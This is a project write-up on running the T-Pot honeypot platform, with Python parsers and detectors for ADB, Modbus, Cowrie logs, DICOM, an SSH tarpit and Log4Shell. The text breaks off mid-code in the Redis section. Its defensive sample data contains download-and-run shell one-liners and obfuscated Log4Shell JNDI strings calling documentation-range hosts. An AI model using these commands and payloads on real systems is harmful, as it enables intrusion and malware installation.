Project: Honeypot (T-Pot)

I’ve set up a honeypot using T-Pot. The honeypot exposes deliberately attackable-looking services to the internet, traps the scanners & opportunistic attackers that hit them, & records what they do, which gives me real data for threat analysis & for deciding what to mitigate.

This project lets me visualize & track, day by day, the attacks & attackers that are active across the internet. From the logs I can research specific IP addresses, known attackers & known attacks, compare the exploitation attempts I see against published CVEs, & check my own network devices against the attacks that are actually in use. One caveat worth keeping in mind: almost everything a honeypot sees is automated mass scanning, so it shows the background noise of the internet rather than targeted attacks.

What is T-Pot?

T-Pot is an open-source all-in-one multi-honeypot platform maintained by Deutsche Telekom Security. It packages the honeypots described below as Docker containers, alongside an ELK stack (Elasticsearch, Logstash, Kibana) that stores & visualizes their logs, Suricata for network IDS alerts on the same traffic, & a handful of supporting tools, so that deploying & managing a dozen honeypots on one host is a single install rather than a dozen separate projects. Because every service it exposes is meant to be attacked, T-Pot belongs on a dedicated, internet-facing host that is isolated from any production network, & nothing it logs should be treated as trusted input.

https://github.security.telekom.com/2024/04/honeypot-tpot-24.04-released.html#technical-architecture

ADB Honey

ADBHoney is a low-interaction honeypot that emulates the network-exposed side of the Android Debug Bridge (ADB): the adbd daemon that Android devices, including many Android-based TV boxes & other IoT gear, expose on TCP port 5555 when network debugging is enabled.

Android Debug Bridge (ADB) is a command-line tool & device daemon that let a developer talk to an Android device from a computer over USB or over the network. It can install & debug apps, open a shell on the device, transfer files, & more. On many devices that network listener accepts connections without any authentication, so an internet-exposed port 5555 hands a shell-level foothold to anyone who finds it.

ADBHoney speaks enough of the ADB wire protocol to complete the connection handshake & accept OPEN requests, so scanners see what looks like an unprotected device. It logs the shell commands attackers send (typically a one-liner that downloads & runs a cryptominer or bot) & captures files they push to the device, giving the raw payloads for analysis.

https://github.com/huuck/ADBHoney
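To show what ADBHoney has to parse, here is an added example (written for this page, not code from the ADBHoney project) that builds & decodes ADB messages & pulls the shell command out of an OPEN request. The sample stream & the download host 198.51.100.7 (an RFC 5737 documentation address) are constructed; the header layout follows the public ADB protocol description (24-byte little-endian header, magic = command XOR 0xFFFFFFFF, data_check = byte sum of the payload, optional since protocol version 0x01000001).

```python
import struct

# ADB wire protocol: every message is a 24-byte little-endian header followed by
# data_length bytes of payload. The magic field is the command XOR 0xFFFFFFFF.
ADB_HEADER = struct.Struct("<6I")   # command, arg0, arg1, data_length, data_check, magic


def adb_message(command: bytes, arg0: int, arg1: int, payload: bytes = b"") -> bytes:
    """Build one ADB message; data_check is the byte sum of the payload."""
    cmd = int.from_bytes(command, "little")
    return ADB_HEADER.pack(cmd, arg0, arg1, len(payload), sum(payload) & 0xFFFFFFFF,
                           cmd ^ 0xFFFFFFFF) + payload


def parse_adb_stream(data: bytes) -> list:
    """Split a client-to-honeypot byte stream into (command, arg0, arg1, payload) tuples.

    A trailing partial message is held back for more data; a bad magic value is
    rejected outright. A zero data_check is accepted because clients speaking
    protocol version 0x01000001 or later may skip the checksum, so a honeypot
    must be lenient here or it loses exactly the sessions it wants.
    """
    messages = []
    offset = 0
    while offset + ADB_HEADER.size <= len(data):
        cmd, arg0, arg1, length, check, magic = ADB_HEADER.unpack_from(data, offset)
        if magic != cmd ^ 0xFFFFFFFF:
            raise ValueError(f"bad magic at offset {offset}: not an ADB message")
        payload = data[offset + ADB_HEADER.size: offset + ADB_HEADER.size + length]
        if len(payload) < length:
            break                     # wait for the rest of this message
        if check and check != sum(payload) & 0xFFFFFFFF:
            raise ValueError(f"payload checksum mismatch at offset {offset}")
        name = cmd.to_bytes(4, "little").decode("ascii", "replace")
        messages.append((name, arg0, arg1, payload))
        offset += ADB_HEADER.size + length
    return messages


def extract_shell_commands(messages) -> list:
    """Return the command strings from OPEN requests for the 'shell:' service."""
    commands = []
    for name, _arg0, _arg1, payload in messages:
        if name == "OPEN" and payload.startswith(b"shell:"):
            commands.append(payload[len(b"shell:"):].rstrip(b"\x00").decode("utf-8", "replace"))
    return commands


# Constructed sample: what a scanner sends after connecting to port 5555.
# CNXN carries (version, maxdata, "host::"); OPEN carries (local-id, 0, service string).
SAMPLE_STREAM = (
    adb_message(b"CNXN", 0x01000000, 4096, b"host::\x00")
    + adb_message(b"OPEN", 1, 0,
                  b"shell:cd /data/local/tmp; wget http://198.51.100.7/x.sh; sh x.sh\x00")
)

if __name__ == "__main__":
    msgs = parse_adb_stream(SAMPLE_STREAM)
    for name, arg0, arg1, payload in msgs:
        print(f"{name} arg0={arg0:#x} arg1={arg1} payload={payload!r}")
    print("shell commands:", extract_shell_commands(msgs))
```

A real honeypot would answer the CNXN with its own CNXN (device name, features) & the OPEN with OKAY before the attacker sends more; the parsing above is the part that turns the stream into the log lines ADBHoney produces.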

CiscoASA

The CiscoASA honeypot emulates a Cisco ASA (Adaptive Security Appliance), the firewall/VPN appliance that sits at the edge of many enterprise networks providing firewall, intrusion prevention, remote-access VPN & related functions.

Within T-Pot it is a low-interaction honeypot: it does not emulate a whole appliance, only the HTTPS-facing web interface (the part of an ASA that is exposed to the internet for VPN & management), & it logs the requests & exploit attempts it receives against that interface.

Attackers target Cisco ASA devices because a successful exploit lands them on the perimeter of a corporate network, the ideal place for unauthorized access, credential theft or reconnaissance. Deploying a CiscoASA honeypot lets security professionals observe the tactics, techniques & procedures (TTPs) used against these appliances without exposing real infrastructure. Because the emulation is shallow, it is mainly useful for spotting mass scanning for known ASA bugs & collecting the payloads those scanners deliver, not for studying hands-on-keyboard activity.

https://github.com/Cymmetria/ciscoasa_honeypot

Citrix Honeypot

The Citrix honeypot is a specialized honeypot within T-Pot that emulates a Citrix ADC (formerly NetScaler) appliance. Citrix ADC is a widely used application delivery controller & load balancer that provides traffic management, SSL offloading, an application firewall & remote access (Citrix Gateway), which puts it directly on the internet edge of the organizations that run it.

The honeypot is low-interaction: it serves a look-alike of the appliance's web front end & logs the requests it receives, in particular the requests scanners use to find unpatched appliances, rather than reproducing a whole ADC with its configuration & services.

Attackers target Citrix ADC devices to exploit vulnerabilities in that front end, gain unauthorized access to the networks behind it, or conduct reconnaissance. A Citrix honeypot lets security professionals monitor & analyze the tactics, techniques & procedures (TTPs) used against these devices without exposing real infrastructure to risk; as with the CiscoASA honeypot, expect mostly automated scanning & exploit attempts, not interactive sessions.

https://github.com/haxrob/citrix-honeypot

Conpot

Conpot is an open-source ICS/SCADA (Industrial Control Systems/Supervisory Control & Data Acquisition) honeypot that emulates the protocols & services of industrial control equipment. It is built to attract & monitor attacks against critical-infrastructure components such as programmable logic controllers (PLCs), human-machine interfaces (HMIs) & other SCADA devices.

Conpot is low-interaction: it runs from templates that describe a device's protocol stack & its register/tag layout (the default template mimics a Siemens SIMATIC S7-200 PLC), & answers protocol requests with canned but plausible values rather than running real controller firmware. That is enough to make scanners & attackers interact with it, & everything they do is captured as tactics, techniques & procedures (TTPs).

Some key features of Conpot include:

  • Emulation of Industrial Protocols: Conpot emulates Modbus/TCP, S7comm, BACnet, IPMI, SNMP & EtherNet/IP, alongside HTTP, FTP & TFTP services that mimic a device's web & file interfaces.
  • Realistic Responses: Each template answers requests with device-specific values, mimicking the behavior of the legitimate industrial device it impersonates.
  • Data Collection: Conpot logs every request, command & interaction with the honeypot, so analysts can see who is scanning for ICS protocols & what they attempt once they find one.
  • Integration with T-Pot: Conpot ships as one of the T-Pot containers, so its ICS/SCADA telemetry lands in the same log pipeline & dashboards as the rest.

https://github.com/mushorg/conpot
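As an added example of the kind of traffic Conpot answers (written for this page, not taken from Conpot), here is a minimal Modbus/TCP encoder/decoder plus the triage rule a honeypot operator actually cares about: function-code reads are enumeration, writes to coils or registers are the alarm. The frame bytes & the severity labels are constructed for the example; the framing (7-byte MBAP header, then the PDU) follows the Modbus/TCP specification.

```python
import struct

MBAP = struct.Struct(">HHHB")   # transaction id, protocol id (0 = Modbus), length, unit id

READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}
IDENT_FUNCTIONS = {17: "Report Server ID", 43: "Encapsulated Interface / Read Device Identification"}


def frame(transaction_id: int, unit_id: int, pdu: bytes) -> bytes:
    # The MBAP length field counts the unit id byte plus the PDU.
    return MBAP.pack(transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def build_read_holding_registers(transaction_id: int, unit_id: int, address: int, count: int) -> bytes:
    """Function 3: read `count` 16-bit holding registers starting at `address`."""
    return frame(transaction_id, unit_id, struct.pack(">BHH", 3, address, count))


def parse_frame(data: bytes) -> dict:
    tid, proto, length, unit = MBAP.unpack_from(data, 0)
    if proto != 0:
        raise ValueError("not Modbus (protocol id != 0)")
    pdu = data[MBAP.size: MBAP.size + length - 1]
    if len(pdu) != length - 1 or not pdu:
        raise ValueError("truncated frame")
    return {"tid": tid, "unit": unit, "function": pdu[0], "data": pdu[1:]}


def parse_read_registers_response(data: bytes) -> list:
    """Decode a function 3/4 response into register values; exception responses set bit 7."""
    f = parse_frame(data)
    if f["function"] & 0x80:
        raise ValueError(f"exception response, code {f['data'][0]}")
    byte_count = f["data"][0]
    return list(struct.unpack(f">{byte_count // 2}H", f["data"][1:1 + byte_count]))


def classify_request(data: bytes) -> dict:
    """Tag a request the way a honeypot should: writes to process values are the real alarm."""
    f = parse_frame(data)
    fc = f["function"]
    if fc in WRITE_FUNCTIONS:
        f.update(name=WRITE_FUNCTIONS[fc], severity="high")       # someone is changing process state
    elif fc in IDENT_FUNCTIONS:
        f.update(name=IDENT_FUNCTIONS[fc], severity="medium")     # device fingerprinting
    elif fc in READ_FUNCTIONS:
        f.update(name=READ_FUNCTIONS[fc], severity="low")         # enumeration / polling
    else:
        f.update(name=f"function {fc}", severity="medium")
    return f


# Constructed frames: a read request, the matching response, and a write that should alert.
READ_REQUEST = build_read_holding_registers(1, 1, 0, 10)
READ_RESPONSE = bytes.fromhex("000100000007010304000a0014")   # registers 0..1 = 10, 20
WRITE_REQUEST = bytes.fromhex("00020000000601060000ffff")     # write 0xFFFF to register 0

if __name__ == "__main__":
    print(READ_REQUEST.hex(), parse_read_registers_response(READ_RESPONSE))
    print(classify_request(WRITE_REQUEST))
```

On a real PLC a write request with no authentication is all it takes to change a setpoint, which is why a single function-code-6 frame from the internet deserves a high-severity event even though it is only 12 bytes.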

Cowrie

Cowrie is a popular medium-interaction SSH & Telnet honeypot, a fork of the older Kippo. It presents a fake Linux host: attackers log in (which username/password pairs succeed is configured in its userdb), land in an emulated shell with a fake filesystem, & every command they type is logged.

Key features of Cowrie include:

  • Emulation of SSH/Telnet Services: Cowrie presents a configurable SSH/Telnet server (banner, host keys, accepted credentials), so it looks like one more weakly protected Linux box to anyone scanning the internet.

  • Interaction Logging: Every login attempt (successful or not), every command typed & every file transfer request is written as one JSON event per line, which is what T-Pot feeds into Elasticsearch.

  • File System Emulation: Cowrie serves a fake filesystem (a snapshot of a Debian install) that attackers can browse with cd, ls, cat & so on, & it fakes the output of common commands. Commands it does not implement produce unrealistic output, which is one of the ways bots fingerprint it.

  • Session Capture: Sessions are recorded in a replayable TTY log, & any file fetched with wget, curl, scp or sftp is saved with its SHA-256 hash, so the actual bot or miner binaries end up on disk for analysis.

  • Integration with T-Pot: Cowrie runs as one of the T-Pot containers & accounts for a large share of what a typical T-Pot sees, since SSH & Telnet brute forcing never stops.

https://github.com/cowrie/cowrie
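Cowrie's JSON log is where most T-Pot analysis starts. The following added example (not part of Cowrie or T-Pot) rolls a few constructed cowrie.json lines into the questions one usually asks: which credentials are being tried, which sessions got past login & ran commands, & which URLs & file hashes those sessions produced. The event names & fields used (eventid, src_ip, session, username, password, input, url, shasum) are the ones Cowrie emits; the log lines, the hash & the 198.51.100.7 / 203.0.113.x addresses are constructed test data.

```python
import json
import re
from collections import Counter, defaultdict

# Constructed cowrie.json lines (one JSON object per line), using RFC 5737 test addresses.
SAMPLE_LOG = r'''
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "protocol": "ssh", "timestamp": "2024-05-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "admin", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:02.000000Z"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.7/bot.sh -O .b; chmod +x .b; ./.b", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:03.000000Z"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.7/bot.sh", "shasum": "ab12cd34ef56ab12cd34ef56ab12cd34ef56ab12cd34ef56ab12cd34ef56ab12", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:04.000000Z"}
{"eventid": "cowrie.session.closed", "duration": 5.2, "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:05.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "198.51.100.23", "session": "0f0f0f0f0f0f", "timestamp": "2024-05-01T10:02:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.23", "session": "0f0f0f0f0f0f", "timestamp": "2024-05-01T10:02:01.000000Z"}
'''

URL_RE = re.compile(r"https?://[^\s;|&'\"]+")


def summarize(lines):
    """Roll up Cowrie events into credentials, commands, downloads and per-session detail."""
    creds, commands, downloads = Counter(), Counter(), Counter()
    sessions = defaultdict(lambda: {"src_ip": None, "logged_in": False, "commands": [], "urls": set()})
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        kind = ev["eventid"]
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            creds[(ev["username"], ev["password"])] += 1
            s["logged_in"] |= kind.endswith("success")
        elif kind == "cowrie.command.input":
            commands[ev["input"]] += 1
            s["commands"].append(ev["input"])
            s["urls"].update(URL_RE.findall(ev["input"]))   # URLs typed, whether or not fetched
        elif kind == "cowrie.session.file_download":
            downloads[(ev.get("url"), ev.get("shasum"))] += 1
            s["urls"].add(ev.get("url"))
    return {"credentials": creds, "commands": commands, "downloads": downloads, "sessions": dict(sessions)}


def top_credentials(summary, n=3):
    return summary["credentials"].most_common(n)


def sessions_with_commands(summary):
    """Sessions that got past login and ran something: the ones worth a human look."""
    return {sid: s for sid, s in summary["sessions"].items() if s["logged_in"] and s["commands"]}


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG.splitlines())
    print("top credentials:", top_credentials(summary))
    for sid, s in sessions_with_commands(summary).items():
        print(sid, s["src_ip"], s["commands"], sorted(s["urls"]))
```

The same rollup is what the Kibana dashboards in T-Pot show; doing it in a script is useful when you want the URLs & hashes as a list to feed into a sandbox or a blocklist.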

Ddospot

DDoSPot is a honeypot “platform” for tracking & monitoring UDP-based Distributed Denial of Service (DDoS) attacks, specifically the reflection/amplification traffic that abuses open UDP services (a small request carrying the victim's spoofed source address elicits a much larger reply aimed at the victim). The platform currently supports the following honeypot services/servers, implemented as relatively simple plugins called pots:

  • DNS server
  • NTP server
  • SSDP server
  • CHARGEN server
  • Random/mock UDP server

https://github.com/aelth/ddospot

Dicompot

Dicompot is a honeypot for DICOM (Digital Imaging & Communications in Medicine), the protocol hospitals use to move medical images between imaging devices (CT, MRI, X-ray) & PACS archives. The name is DICOM + pot; despite how it reads, it has nothing to do with Dionaea or Conpot.

  • What it emulates: Dicompot acts as a DICOM server (the “service class provider” role a PACS plays), listening on the well-known DICOM port 104 (11112 is also common), & accepts the association that every DICOM client must open before it can do anything.

  • What it logs: each association request, including the calling & called Application Entity (AE) titles the client presents, & the DICOM services it then tries to use, such as C-ECHO (the DICOM “ping”), C-FIND (querying for studies) & C-STORE (sending images).

Medical imaging systems are a worthwhile honeypot target because plain DICOM does no authentication beyond checking the AE title & source address, & an AE title is a label, not a secret, so any PACS reachable from the internet will answer queries for patient studies. Dicompot lets security professionals see who is scanning for DICOM endpoints & what they ask for, without putting real patient data behind the port.

https://github.com/nsmfoo/dicompot
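To make the association step concrete, here is an added example (not Dicompot code) that builds & parses the A-ASSOCIATE-RQ PDU a DICOM client sends first, pulling out the called & calling AE titles a honeypot logs. The PDU layout is the one in DICOM PS3.8; the AE titles ECHOSCU / ANY-SCP are the defaults of dcmtk's echoscu tool, a common probe, & the allow-list of expected AE titles is a constructed assumption.

```python
import struct

PDU_TYPES = {0x01: "A-ASSOCIATE-RQ", 0x02: "A-ASSOCIATE-AC", 0x03: "A-ASSOCIATE-RJ",
             0x04: "P-DATA-TF", 0x05: "A-RELEASE-RQ", 0x06: "A-RELEASE-RP", 0x07: "A-ABORT"}


def _ae_title(title: str) -> bytes:
    # AE titles are 16 bytes, ASCII, space padded (DICOM PS3.8).
    if not title or len(title) > 16:
        raise ValueError("AE title must be 1..16 characters")
    return title.encode("ascii").ljust(16)


def build_associate_rq(called_ae: str, calling_ae: str, variable_items: bytes = b"") -> bytes:
    """A-ASSOCIATE-RQ: 6-byte PDU header, then protocol version (1), 2 reserved bytes,
    called AE title, calling AE title, 32 reserved bytes, then the variable items
    (application context, presentation contexts, user info), left empty here."""
    body = (struct.pack(">HH", 1, 0) + _ae_title(called_ae) + _ae_title(calling_ae)
            + bytes(32) + variable_items)
    return struct.pack(">BBI", 0x01, 0, len(body)) + body


def parse_pdu(data: bytes) -> dict:
    if len(data) < 6:
        raise ValueError("short PDU header")
    pdu_type, _reserved, length = struct.unpack_from(">BBI", data, 0)
    body = data[6:6 + length]
    if len(body) < length:
        raise ValueError("truncated PDU")
    info = {"type": PDU_TYPES.get(pdu_type, f"unknown(0x{pdu_type:02x})"), "length": length}
    if pdu_type in (0x01, 0x02):          # RQ and AC share the AE-title layout
        version, = struct.unpack_from(">H", body, 0)
        info.update(version=version,
                    called_ae=body[4:20].decode("ascii", "replace").strip(),
                    calling_ae=body[20:36].decode("ascii", "replace").strip())
    return info


KNOWN_AE_TITLES = {"PACS01"}     # constructed: the AE title this (fake) archive expects to be called by
SCANNER_DEFAULTS = {"ECHOSCU", "ANY-SCP"}


def triage(data: bytes) -> dict:
    """What a DICOM honeypot logs first: who is calling whom, and whether it looks like a probe."""
    info = parse_pdu(data)
    if info["type"] == "A-ASSOCIATE-RQ":
        info["suspicious"] = (info["called_ae"] not in KNOWN_AE_TITLES
                              or info["calling_ae"] in SCANNER_DEFAULTS)
    return info


SAMPLE_PROBE = build_associate_rq("ANY-SCP", "ECHOSCU")   # constructed: echoscu's default titles

if __name__ == "__main__":
    print(triage(SAMPLE_PROBE))
```

A real PACS would reject an association whose called AE title it does not own; a honeypot accepts it anyway, which is exactly why the mismatch is a good first signal.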

Dionaea

Dionaea is a low-interaction honeypot designed to capture malware samples & exploit attempts against network services. It emulates the protocol handshakes of SMB (Server Message Block), HTTP, FTP (File Transfer Protocol) & a number of others just far enough to let an exploit or file transfer run its course, then keeps whatever was delivered.

Key features of Dionaea:

  • Emulation of Vulnerable Services: Dionaea implements the wire protocols of services with a long history of remote exploitation, so it looks like a legitimate target to attackers scanning the internet; it does not run real, vulnerable software, which keeps the risk of an actual compromise low.

  • Malware Capture: When an exploit is thrown at an emulated service, Dionaea detects the shellcode, follows its download or connect-back instructions & stores the retrieved sample (named by hash) for later analysis.

  • Interaction Logging: Dionaea logs every connection, the commands issued & every file transfer, giving insight into attacker behavior & tooling.

  • Protocol Support: SMB, HTTP, FTP, TFTP, MSSQL, MySQL, SIP & MQTT are among the services it emulates, so it catches a broad range of malicious activity aimed at different services.

https://github.com/DinoTools/dionaea

Endlessh

Endlessh is a lightweight, open-source SSH tarpit. Unlike Cowrie it never completes an SSH handshake or collects credentials; its only job is to hold SSH scanners & brute-forcers on the line for as long as possible. It relies on a detail of the SSH protocol (RFC 4253): before the server sends its “SSH-2.0-...” version string it may send any number of other text lines, & a compliant client has to read them all while waiting. Endlessh sends an endless stream of random banner lines, very slowly, so the client sits waiting for a version string that never arrives.

Key features of Endlessh include:

  • Tarpitting: By default Endlessh sends one short random line roughly every 10 seconds & never the version string. A well-behaved SSH client or bot can be held for hours or days, which wastes the attacker's time & connection slots rather than just refusing them.

  • Minimal Resource Usage: Endlessh is a small single-threaded C program that keeps one socket per trapped client & almost nothing else, so it can hold a large number of connections on a low-powered device.

  • Logging: Endlessh logs each connection's source IP & port, when it connected & how long it was held, which is the useful metric for a tarpit.

  • Easy to Deploy: The usual setup is to move the real sshd to another port & let Endlessh listen on 22, so that everything hitting the default port is a scanner. It needs almost no configuration beyond the port & the delay.

https://github.com/skeeto/endlessh
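The tarpit trick is small enough to show in full. The following added example (written for this page; Endlessh itself is a C program & this is not its code) implements the same idea in Python: a generator for the random pre-version banner lines RFC 4253 permits, a validity check for them, & an asyncio server that feeds them to each client one every 10 seconds. The port 2222 & the delay are assumptions for the example.

```python
import asyncio
import random
import string
import time

# Characters allowed in a banner line: printable ASCII, never CR or LF (RFC 4253, section 4.2).
PRINTABLE = string.ascii_letters + string.digits + string.punctuation + " "


def tarpit_line(rng: random.Random, max_len: int = 32) -> bytes:
    """One pre-version-string banner line: 3..max_len random characters, CRLF-terminated,
    never starting with 'SSH-' (that prefix would end the client's wait)."""
    while True:
        text = "".join(rng.choice(PRINTABLE) for _ in range(rng.randint(3, max_len)))
        if not text.startswith("SSH-"):
            return text.encode("ascii") + b"\r\n"


def is_valid_preamble_line(line: bytes) -> bool:
    """The RFC 4253 constraints a compliant client tolerates before the version exchange."""
    return (line.endswith(b"\r\n") and len(line) <= 255 and not line.startswith(b"SSH-")
            and b"\r" not in line[:-2] and b"\n" not in line[:-2])


async def handle_client(reader, writer, delay: float = 10.0, rng=None):
    rng = rng or random.Random()
    peer = writer.get_extra_info("peername")
    started = time.monotonic()
    try:
        while True:                     # keep the client waiting for a version string that never comes
            writer.write(tarpit_line(rng))
            await writer.drain()        # raises ConnectionError once the client gives up
            await asyncio.sleep(delay)
    except (ConnectionError, asyncio.CancelledError):
        pass
    finally:
        # This is the one log line a tarpit produces: who, and for how long.
        print(f"{peer[0]}:{peer[1]} held for {time.monotonic() - started:.0f}s")
        writer.close()


async def serve(host: str = "0.0.0.0", port: int = 2222):
    server = await asyncio.start_server(handle_client, host, port)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    asyncio.run(serve())
```

Run it, then `ssh -p 2222 localhost` & watch the client hang: the line generator is the whole trick, & the only per-client cost is one socket & a sleeping coroutine.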

Heralding

Heralding is a low-interaction credentials collector: it speaks just enough of each protocol to reach the authentication step, logs the username & password offered together with the source address, & then rejects the login. Since no login ever succeeds it exposes nothing, but it also never sees what attackers would do after logging in; pair it with Cowrie for that. Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql & socks5.

https://github.com/johnnykv/heralding/blob/master/README.rst

IPPHoney

IPPHoney is a low-interaction honeypot that emulates a printer speaking the Internet Printing Protocol (IPP), the HTTP-based protocol (TCP port 631) used to submit print jobs & query printers over local networks & the internet. Printers exposed on 631 are a well-known target, both for mischief (printing to them) & as a foothold inside a network, & IPPHoney is built to attract & record that traffic.

Key features of IPPHoney include:

  • Emulation of IPP Printers: IPPHoney emulates the behavior of IPP printers, making it appear as a legitimate printer on the network.

  • Logging: The honeypot logs all interaction attempts made by attackers, including print job requests & configuration queries.

  • Detection of Attacks: IPPHoney captures information about potential attacks targeting IPP printers, such as attempts to exploit vulnerabilities or gain unauthorized access.

  • Threat Intelligence Gathering: By deploying IPPHoney, security professionals can gather intelligence on the tactics, techniques, & procedures (TTPs) used by attackers targeting IPP printers.

https://github.com/bontchev/ipphoney

Log4Pot

A honeypot for the Log4Shell vulnerability (CVE-2021-44228 in Log4j 2), the JNDI lookup injection in which a string such as ${jndi:ldap://attacker/a} placed anywhere that gets logged makes the application fetch & run attacker-supplied code.

  • Listens on various ports for Log4Shell exploitation attempts.
  • Detects exploitation in the request line & headers, which is where scanners put the lookup string (User-Agent, X-Api-Version, query parameters & so on).
  • Downloads the exploit payloads recursively: first the LDAP/RMI reference the lookup points at, then the class or script that reference leads to.
  • Logs to file & to Azure blob storage.

https://github.com/thomaspatzke/Log4Pot
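Detecting the lookup string is harder than grepping for ${jndi: because scanners nest Log4j lookups to obfuscate it. The following added example (not Log4Pot code) normalizes a request line & headers the way a detector needs to: URL-decode, then resolve the inner ${lower:}, ${upper:} & ${x:-default} lookups from the inside out until only the jndi lookup remains. The sample requests & the 203.0.113.9 address are constructed.

```python
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a lookup with no nested lookup inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate the Log4j lookups attackers use as obfuscation; leave a jndi lookup (the attack) in place."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("jndi:"):
        return match.group(0)
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${anything:-default}: a failed lookup yields the default text
        return body.split(":-", 1)[1]
    return match.group(0)                 # ${env:HOME} and friends: unknown here, keep as is


def normalize(value: str, max_rounds: int = 16) -> str:
    """Undo URL encoding and collapse nested lookups from the inside out until nothing changes."""
    text = unquote(unquote(value))        # twice: double-encoded query strings are common
    for _ in range(max_rounds):           # bounded so a pathological input cannot spin forever
        reduced = INNERMOST.sub(_resolve, text)
        if reduced == text:
            break
        text = reduced
    return text


def find_log4shell(request_line: str, headers: dict) -> list:
    """Return (location, normalized value) for every field carrying a JNDI lookup."""
    hits = []
    for where, value in [("request-line", request_line), *headers.items()]:
        cleaned = normalize(value)
        if JNDI.search(cleaned):
            hits.append((where, cleaned))
    return hits


# Constructed requests: plain, lower-obfuscated, default-value-obfuscated, URL-encoded, benign.
SAMPLE_REQUESTS = [
    ("GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1", {"User-Agent": "Mozilla/5.0"}),
    ("GET / HTTP/1.1", {"User-Agent": "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9:1389/a}"}),
    ("GET / HTTP/1.1", {"X-Api-Version": "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/a}"}),
    ("GET /?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1", {}),
    ("GET /index.html HTTP/1.1", {"User-Agent": "curl/8.0"}),
]

if __name__ == "__main__":
    for line, headers in SAMPLE_REQUESTS:
        print(find_log4shell(line, headers) or "clean")
```

The normalized value is what you want to log & extract the callback host from; the raw header alone tells you almost nothing once it has been obfuscated.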

Mailoney

Mailoney is a low-interaction SMTP (Simple Mail Transfer Protocol) honeypot. It speaks enough SMTP to look like a real mail server, attracting the bots that scan for open relays & brute-force mail credentials, without ever delivering a message anywhere.

Key features of Mailoney include:

  • Emulation of an SMTP server: Mailoney accepts connections, runs through the SMTP conversation (HELO/EHLO, AUTH, MAIL FROM, RCPT TO, DATA) & responds as a server would. Its modules select the behavior: an open-relay mode that accepts any mail & records it, & a mode that presents a Postfix-like AUTH prompt to harvest credentials.

  • Logging: Connection attempts, the credentials offered to AUTH, envelope sender & recipient addresses & the full message content submitted in relay mode are all logged.

  • Detection of Malicious Activity: What shows up is mostly open-relay probing (a test message sent through the honeypot to see whether it relays), spam runs & credential stuffing against the mail login.

  • Threat Intelligence Gathering: The harvested credentials & spam samples show which accounts & domains attackers are after, which is useful for tuning an organization's own mail authentication & relay restrictions.

https://github.com/phin3has/mailoney

Medpot

Medpot is a honeypot that emulates an HL7 / FHIR interface, the messaging standards used to exchange patient records between healthcare systems, so it catches scanning & probing aimed at hospital integration endpoints.

https://github.com/schmalle/medpot

Redishoneypot

Redishoneypot is a honeypot that emulates a Redis server. Redis is an open-source, in-memory data structure store commonly used as a database, cache or message broker. It ships without authentication, & older versions listened on all interfaces by default, so internet-exposed instances are scanned for constantly. Redishoneypot is built to attract & monitor that traffic: unauthorized access attempts, exploitation of vulnerabilities & reconnaissance.

Key features of Redishoneypot include:

  • Emulation of the Redis Protocol: The honeypot speaks RESP, the Redis wire protocol, & answers commands as a real instance would, so both scanners sending a bare PING or INFO & tools that follow up with a full attack sequence keep talking to it.

  • Logging & Monitoring: Every connection & every command received is logged, which is enough to reconstruct an attacker's whole session.

  • Detection of Attacks: Beyond vulnerability exploits, the interesting traffic is abuse of legitimate Redis features for code execution: CONFIG SET dir/dbfilename followed by SAVE to drop an RDB file into a cron directory, a .ssh directory or a web root, or SLAVEOF/REPLICAOF pointing the instance at a rogue master that serves a malicious module.

  • Threat Intelligence Gathering: The logged sessions show which persistence tricks & which payload hosts are currently in use against Redis, which is exactly what you need to audit your own deployments (bind address, requirepass, protected mode, renamed CONFIG) against.
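To make the persistence trick concrete, here is an added example (not code from the Redis honeypot) with a small RESP encoder/parser & a detector that walks a captured session & flags the CONFIG SET dir / dbfilename / SET / SAVE sequence, a rogue SLAVEOF & MODULE LOAD. The session bytes & the payload host 198.51.100.7 are constructed; the list of sensitive directories is an assumption you would tune.

```python
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www")   # assumption


def encode_command(*args) -> bytes:
    """RESP array of bulk strings, the form every Redis client (and scanner) sends."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode() if isinstance(arg, str) else arg
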